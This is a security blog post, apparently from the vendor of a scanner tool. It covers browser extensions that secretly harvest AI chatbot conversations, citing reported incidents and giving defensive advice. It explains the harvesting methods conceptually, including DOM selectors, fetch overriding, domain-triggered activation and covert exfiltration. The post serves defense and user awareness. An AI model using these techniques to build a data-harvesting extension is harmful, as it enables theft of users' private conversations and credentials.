Every day, millions of people share sensitive information with AI chatbots. Business strategies, proprietary source code, personal medical questions, legal details, financial records. The conversations feel private, tucked behind a login screen on a platform you trust. But most users never consider that their own browser extensions can silently read every word they type and every response they receive.

This is not a theoretical concern. Over the past several months, security researchers have uncovered multiple real-world campaigns where browser extensions were actively harvesting AI conversations at scale, affecting millions of users. The pattern is consistent, the techniques are well understood, and the problem is accelerating.

Real Incidents: Extensions Caught Harvesting AI Chats

In December 2025, researchers at Koi Security discovered that a widely installed VPN extension, one with over 8 million users and a Google "Featured" badge in the Chrome Web Store, was silently capturing conversations from ChatGPT, Claude, Gemini, and at least five other AI platforms. The extension forwarded complete conversation transcripts to external servers, where the data was sold to data brokers. Malwarebytes independently confirmed the findings. The extension had been available for years and had passed multiple Chrome Web Store reviews without detection.

In January 2026, SOCRadar and Dataprise published reports on two separate extensions that impersonated legitimate AI assistant tools. Together, these extensions had been installed by over 900,000 users. They collected complete ChatGPT and DeepSeek conversation histories, browsing data, and authentication tokens. The stolen tokens gave attackers persistent access to victims' AI accounts even after the extensions were removed.

In March 2026, Microsoft's own security team published research documenting a class of extensions specifically designed to passively collect AI-assisted chat content. Their analysis highlighted that these extensions used sophisticated evasion techniques, remaining dormant during normal browsing and only activating their data collection routines when they detected an AI platform URL in the browser.

These are not isolated cases. They represent a growing category of attacks that specifically targets AI conversations because of the uniquely valuable data they contain.

How Extension-Based Interception Actually Works

To understand why this threat is so difficult to detect, you need to understand how browser extensions interact with web pages at a technical level. The mechanism centers on a feature called content scripts. For a deeper technical breakdown of content scripts and the Chrome extension permission model, see our post on Chrome Extension Security.

Content Scripts and DOM Access

When a browser extension declares the content_scripts field in its manifest, or uses the scripting.executeScript API, it can inject JavaScript directly into any web page that matches a specified URL pattern. That injected script runs in the context of the page itself. It can read the entire DOM, which includes every message displayed in a chat interface, every character you type into an input field, and every response the AI generates.

A content script targeting ChatGPT, for example, could use a simple DOM query like document.querySelectorAll('[data-message-author-role]') to extract every message in the conversation thread. Similar selectors work for Claude, Gemini, and other platforms. The script can also attach MutationObserver listeners to detect new messages the instant they appear, capturing the conversation in real time.

Intercepting Network Requests

Content scripts are not limited to reading the visible page. They can also intercept the underlying network traffic. By overriding the native XMLHttpRequest and fetch APIs before the page loads, a malicious script can capture every API call between the browser and the AI platform's servers. This includes the raw request payloads (your prompts) and the raw response bodies (the AI's answers), often in structured JSON format that is trivially easy to parse and store.

Selective Activation to Avoid Detection

The most sophisticated malicious extensions do not behave suspiciously during normal browsing. They include legitimate functionality, a working VPN, a real grammar checker, a genuine productivity tool, and only activate their harvesting code when they detect that the user is visiting an AI platform. The extension checks the current URL against a list of known AI chat domains. If there is no match, the extension does nothing unusual. If the URL matches chat.openai.com, claude.ai, gemini.google.com, or similar domains, the harvesting payload activates.

This conditional behavior makes the extensions nearly impossible to detect through casual observation or even basic automated scanning. The extension appears clean during testing because it only reveals its true purpose on specific sites.

Data Exfiltration

Once the data is captured, the extension sends it to a remote server controlled by the attacker. This is typically done through standard HTTPS POST requests to domains that appear innocuous, sometimes disguised as analytics or telemetry endpoints. The data is often batched and sent at intervals to avoid triggering network monitoring tools. Some extensions encode the stolen data as URL parameters or embed it in image requests to bypass content security policies.

Why AI Conversations Are High-Value Targets

Browser extensions have always been able to read web page content. So why are AI chat platforms drawing special attention from attackers now? The answer is straightforward: the density of sensitive information in AI conversations is extraordinarily high compared to typical web browsing.

Proprietary Code and Intellectual Property

Developers routinely paste entire functions, classes, and configuration files into AI assistants for debugging help, code review, or refactoring suggestions. A single conversation might contain proprietary algorithms, database schemas, API architectures, or deployment configurations that represent months of engineering work.

Business Strategy and Internal Communications

Executives and managers use AI tools to draft internal memos, analyze competitive landscapes, brainstorm product strategies, and prepare financial projections. These conversations often contain information that would be classified as confidential or trade-secret material in a corporate context.

Personal Health, Legal, and Financial Details

Individuals use AI chatbots to ask about medical symptoms, legal situations, tax strategies, and personal financial decisions. These conversations frequently contain details that people would never share on a public forum or even in an unencrypted email.

Credentials and API Keys

It is surprisingly common for users to paste API keys, database connection strings, environment variables, and even passwords into AI chat prompts while troubleshooting. A single leaked API key can provide an attacker with direct access to cloud infrastructure, payment processing systems, or customer databases.

Structured and Searchable Data

Unlike the fragments of data an extension might capture from general web browsing, AI conversations are neatly structured as question-and-answer pairs. They are inherently organized, keyword-rich, and easy to index. This makes them ideal for resale to data brokers, for targeted phishing campaigns, or for competitive intelligence operations.

The Permission Problem

A fundamental challenge is that the permissions required for malicious AI chat harvesting are the same permissions required for many legitimate extension features. An extension that needs to read page content to check your grammar, insert coupons, or modify page styling will request the same activeTab or broad host permissions that a malicious extension would use to read your AI conversations.

Chrome's permission system does not distinguish between "read this page to help the user" and "read this page to exfiltrate data." From the browser's perspective, both actions are identical. This is why permission auditing alone is not sufficient protection. You need to understand not just what an extension can do, but what it is doing. For a broader look at how extension permissions create security blind spots, see The Permission Problem: Why Browser Extensions Are a Blind Spot.

What You Can Do About It

The good news is that practical defenses exist. The key is layering multiple protections rather than relying on any single measure.

1. Audit and Minimize Your Extensions

Open your browser's extension manager right now and look at every extension you have installed. For each one, ask: do I actively use this? Do I know what company made it? When was it last updated? Remove anything you do not recognize or no longer need. Every extension you keep installed is an additional piece of code that has access to your browsing activity.

2. Scrutinize Permissions Before Installing

Before adding any new extension, read its permission requests carefully. Be especially cautious of extensions that request "Read and change all your data on all websites." That permission grants full content script access to every page you visit, including AI chat platforms. Some extensions need this permission legitimately, but many request it when narrower permissions would suffice.

3. Use a Dedicated Browser Profile

Create a separate browser profile specifically for sensitive AI work. Install zero extensions in that profile, or only install extensions you have thoroughly vetted. This creates an isolated environment where your AI conversations cannot be accessed by the extensions in your primary browsing profile.

4. Watch for Warning Signs

Be suspicious of extensions that suddenly change ownership, receive unexpected updates after long periods of inactivity, or request new permissions they did not previously need. Attackers frequently purchase established extensions with large user bases and then push malicious updates to the existing install base.

5. Use AI Chat Shield for Continuous Monitoring

We built AI Chat Shield specifically to close this gap. It scans every extension in your browser, analyzes their permissions and behaviors, and scores them on a 0 to 100 risk scale. It flags extensions that have the technical capability to access AI chat platforms, even if those extensions appear legitimate on the surface. The free tier gives you instant visibility into your risk exposure. Pro adds real-time monitoring that continuously watches for suspicious extension behavior and can auto-disable risky extensions before they capture your data.


The Bottom Line

AI tools are transforming how we work, think, and solve problems. But every conversation you have with an AI assistant is a potential data source for any extension running in your browser. The incidents from late 2025 and early 2026 prove that this is not a hypothetical risk. Millions of users have already had their AI conversations harvested without their knowledge.

Protecting your AI conversations requires the same seriousness you would apply to protecting passwords or financial accounts. Audit your extensions, minimize your attack surface, and use tools designed to detect the threats that browsers themselves cannot see. Your AI conversations deserve the same security you expect from the rest of your digital life.